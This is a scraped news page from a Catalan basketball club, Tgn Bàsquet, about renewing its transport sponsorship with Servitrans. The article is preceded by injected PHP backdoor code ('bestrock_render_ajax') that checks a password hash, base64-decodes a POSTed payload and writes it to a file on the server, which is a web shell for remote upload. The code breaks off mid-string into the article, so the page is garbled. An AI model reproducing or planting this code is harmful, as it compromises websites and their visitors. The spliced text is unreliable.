function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet i Servitrans renoven el seu conveni de col·laboració - Tgn Bàsquet Club -

El TGN Bàsquet i Servitrans renoven el seu conveni de col·laboració

By
Updated: setembre 22, 2015

El TGN Bàsquet i l’empresa de transports Servitrans han renovat el conveni de col·laboració pel qual aquesta companyia d’autobusos serà l’encarregada de fer els desplaçaments dels diferents equips del club. El conveni entre l’entitat lila i Servitrans es remunta sis temporades enrere i, amb la signatura d’aquesta tarda, la vinculació entre ambdues parts es perllonga, com a mínim, una campanya més, amb la voluntat de continuïtat. “Estem molt satisfets. Servitrans sempre ens ha fet un gran servei. Volem continuar amb ells”, ha dit Josep Maria Adam, president del TGN Bàsquet. El màxim dirigent de l’entitat lila ha certificat l’acord amb el senyor Pedro Ocaña, propietari de Servitrans, una empresa que porta gairebé 21 anys en el sector.

L’any passat un vehicle de Servitrans ja va portar els colors del TGN Bàsquet, un fet que amb la signatura de renovació de l’acord, també es repetirà enguany.

 

IMGP4812mm

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *